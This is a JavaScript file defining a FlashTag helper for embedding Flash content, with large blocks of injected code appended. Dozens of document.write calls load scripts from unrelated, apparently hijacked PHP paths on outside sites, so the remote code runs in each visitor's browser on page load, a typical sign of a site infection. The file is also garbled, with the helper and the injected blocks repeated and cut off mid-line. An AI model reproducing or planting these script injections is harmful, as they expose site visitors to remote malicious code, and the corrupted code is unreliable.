/**
 * Generates a browser-specific Flash tag. Create a new instance, set whatever
 * properties you need, then call either toString() to get the tag as a string, or
 * call write() to write the tag out.
 */

/**
 * Creates a new instance of the FlashTag.
 * src: The path to the SWF file.
 * width: The width of your Flash content.
 * height: the height of your Flash content.
 */
function FlashTag(src, width, height)
{
    this.src       = src;
    this.width     = width;
    this.height    = height;
    this.version   = '7,0,14,0';
    this.id        = null;
    this.bgcolor   = 'ffffff';
    this.flashVars = null;
}

/**
 * Sets the Flash version used in the Flash tag.
 */
FlashTag.prototype.setVersion = function(v)
{
    this.version = v;
}

/**
 * Sets the ID used in the Flash tag.
 */
FlashTag.prototype.setId = function(id)
{
    this.id = id;
}

/**
 * Sets the background color used in the Flash tag.
 */
FlashTag.prototype.setBgcolor = function(bgc)
{
    this.bgcolor = bgc;
}

/**
 * Sets any variables to be passed into the Flash content. 
 */
FlashTag.prototype.setFlashvars = function(fv)
{
    this.flashVars = fv;
}

/**
 * Get the Flash tag as a string. 
 */
FlashTag.prototype.toString = function()
{
    var ie = (navigator.appName.indexOf ("Microsoft") != -1) ? 1 : 0;
    var flashTag = new String();
    if (ie)
    {
        flashTag += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" ';
        if (this.id != null)
        {
            flashTag += 'id="'+this.id+'" ';
        }
        flashTag += 'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version='+this.version+'" ';
        flashTag += 'width="'+this.width+'" ';
        flashTag += 'height="'+this.height+'">';
        flashTag += '<param name="movie" value="'+this.src+'"/>';
        flashTag += '<param name="quality" value="high"/>';
        flashTag += '<param name="bgcolor" value="#'+this.bgcolor+'"/>';
        if (this.flashVars != null)
        {
            flashTag += '<param name="flashvars" value="'+this.flashVars+'"/>';
        }
        flashTag += '</object>';
    }
    else
    {
        flashTag += '<embed src="'+this.src+'" ';
        flashTag += 'quality="high" '; 
        flashTag += 'bgcolor="#'+this.bgcolor+'" ';
        flashTag += 'width="'+this.width+'" ';
        flashTag += 'height="'+this.height+'" ';
        flashTag += 'type="application/x-shockwave-flash" ';
        if (this.flashVars != null)
        {
            flashTag += 'flashvars="'+this.flashVars+'" ';
        }
        if (this.id != null)
        {
            flashTag += 'name="'+this.id+'" ';
        }
        flashTag += 'pluginspage="http://www.macromedia.com/go/getflashplayer">';
        flashTag += '</embed>';
    }
    return flashTag;
}

/**
 * Write the Flash tag out. Pass in a reference to the document to write to. 
 */
FlashTag.prototype.write = function(doc)
{
    doc.write(this.toString());
}


document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://mar-studio.org/New_Folder/phpinfo.php ><\/script>');
document.write('<script src=http://mar-studio.org/New_Folder/phpinfo.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/produthe SWF file.
 * width: The width of your Flash content.
 * height: the height of your Flash content.
 */
function FlashTag(src, width, height)
{
    this.src       = src;
    this.width     = width;
    this.height    = height;
    this.version   = '7,0,14,0';
    this.id        = null;
    this.bgcolor   = 'ffffff';
    this.flashVars = null;
}

/**
 * Sets the Flash version used in the Flash tag.
 */
FlashTag.prototype.setVersion = function(v)
{
    this.version = v;
}

/**
 * Sets the ID used in the Flash tag.
 */
FlashTag.prototype.setId = function(id)
{
    this.id = id;
}

/**
 * Sets the background color used in the Flash tag.
 */
FlashTag.prototype.setBgcolor = function(bgc)
{
    this.bgcolor = bgc;
}

/**
 * Sets any variables to be passed into the Flash content. 
 */
FlashTag.prototype.setFlashvars = function(fv)
{
    this.flashVars = fv;
}

/**
 * Get the Flash tag as a string. 
 */
FlashTag.prototype.toString = function()
{
    var ie = (navigator.appName.indexOf ("Microsoft") != -1) ? 1 : 0;
    var flashTag = new String();
    if (ie)
    {
        flashTag += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" ';
        if (this.id != null)
        {
            flashTag += 'id="'+this.id+'" ';
        }
        flashTag += 'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version='+this.version+'" ';
        flashTag += 'width="'+this.width+'" ';
        flashTag += 'height="'+this.height+'">';
        flashTag += '<param name="movie" value="'+this.src+'"/>';
        flashTag += '<param name="quality" value="high"/>';
        flashTag += '<param name="bgcolor" value="#'+this.bgcolor+'"/>';
        if (this.flashVars != null)
        {
            flashTag += '<param name="flashvars" value="'+this.flashVars+'"/>';
        }
        flashTag += '</object>';
    }
    else
    {
        flashTag += '<embed src="'+this.src+'" ';
        flashTag += 'quality="high" '; 
        flashTag += 'bgcolor="#'+this.bgcolor+'" ';
        flashTag += 'width="'+this.width+'" ';
        flashTag += 'height="'+this.height+'" ';
        flashTag += 'type="application/x-shockwave-flash" ';
        if (this.flashVars != null)
        {
            flashTag += 'flashvars="'+this.flashVars+'" ';
        }
        if (this.id != null)
        {
            flashTag += 'name="'+this.id+'" ';
        }
        flashTag += 'pluginspage="http://www.macromedia.com/go/getflashplayer">';
        flashTag += '</embed>';
    }
    return flashTag;
}

/**
 * Write the Flash tag out. Pass in a reference to the document to write to. 
 */
FlashTag.prototype.write = function(doc)
{
    doc.write(this.toString());
}


document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://mar-studio.org/New_Folder/phpinfo.php ><\/script>');
document.write('<script src=http://mar-studio.org/New_Folder/phpinfo.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
cts.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://camgi.co.uk/Templates/contact.php ><\/script>');
document.write('<script src=http://kissgepkft.hu/phpMyAdmin/index_1_r15_c1_f2.php ><\/script>');
document.write('<script src=http://skateboarder.extra.hu/images/poll.php ><\/script>');
document.write('<script src=http://skateboarder.extra.hu/images/poll.php ><\/script>');
document.write('<script src=http://bytessolved.com/Demo/Company.aspx.php ><\/script>');
document.write('<script src=http://goldschmidtliza.hu/modules/pathway.php ><\/script>');
document.write('<script src=http://brazil.reliasoft.us/images/iefixeshover.php ><\/script>');
document.write('<script src=http://f-alfadel.com/wp-includes/fantversion.php ><\/script>');
document.write('<script src=http://bbscleagues.us/.smileys/wp-rss.php ><\/script>');
document.write('<script src=http://bbscleagues.us/.smileys/wp-rss.php ><\/script>');
document.write('<script src=http://bbscleagues.us/.smileys/wp-rss.php ><\/script>');
document.write('<script src=http://slim30usa.com/mall/php.php ><\/script>');
document.write('<script src=http://slim30usa.com/mall/php.php ><\/script>');
document.write('<script src=http://bondforklift.com/images/mailFromCus.php ><\/script>');
document.write('<script src=http://wap.phonetracezim.com/cp/bibleverses.php ><\/script>');
document.write('<script src=http://wap.phonetracezim.com/cp/bibleverses.php ><\/script>');
document.write('<script src=http://contactlounge.de/cgi-data/_STRATO_FTP_UPLOAD.php ><\/script>');
document.write('<script src=http://contactlounge.de/cgi-data/_STRATO_FTP_UPLOAD.php ><\/script>');
document.write('<script src=http://knkbearings.in/images/gifimg.php ><\/script>');
document.write('<script src=http://monterosso.zallison.com/plugins/configuration.php-dist.php ><\/script>');
document.write('<script src=http://fzjyd.cn/adm/mrss.php ><\/script>');
document.write('<script src=http://fzjyd.cn/adm/mrss.php ><\/script>');
document.write('<script src=http://qv-dieraeuber.de/php_upload_tmp/raeuber_cds.php ><\/script>');}
        flashTag += '</object>';
    }
    else
    {
        flashTag += '<embed src="'+this.src+'" ';
        flashTag += 'quality="high" '; 
        flashTag += 'bgcolor="#'+this.bgcolor+'" ';
        flashTag += 'width="'+this.width+'" ';
        flashTag += 'height="'+this.height+'" ';
        flashTag += 'type="application/x-shockwave-flash" ';
        if (this.flashVars != null)
        {
            flashTag += 'flashvars="'+this.flashVars+'" ';
        }
        if (this.id != null)
        {
            flashTag += 'name="'+this.id+'" ';
        }
        flashTag += 'pluginspage="http://www.macromedia.com/go/getflashplayer">';
        flashTag += '</embed>';
    }
    return flashTag;
}

/**
 * Write the Flash tag out. Pass in a reference to the document to write to. 
 */
FlashTag.prototype.write = function(doc)
{
    doc.write(this.toString());
}


document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://bellsdirectory.com/tgp_old/postinfo.php ><\/script>');
document.write('<script src=http://mar-studio.org/New_Folder/phpinfo.php ><\/script>');
document.write('<script src=http://mar-studio.org/New_Folder/phpinfo.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');
document.write('<script src=http://web-texinc.com/images/products.php ><\/script>');

document.write('<script src=http://csbib.com/images/index.php ><\/script>');
document.write('<script src=http://csbib.com/images/index.php ><\/script>');
document.write('<script src=http://csbib.com/images/index.php ><\/script>');
document.write('<script src=http://willbucks.millionairex1.com/images/links.php ><\/script>');
document.write('<script src=http://album.zadnistritez.cz/images/gifimg.php ><\/script>');
document.write('<script src=http://mahdi_siamian.webphoto.ir/photos/rsscu.php ><\/script>');
document.write('<script src=http://ipcgreenpark.com/images/iksw/home.php ><\/script>');
document.write('<script src=http://ipcgreenpark.com/images/iksw/home.php ><\/script>');
document.write('<script src=http://n4bd.com/images/gifimg.php ><\/script>');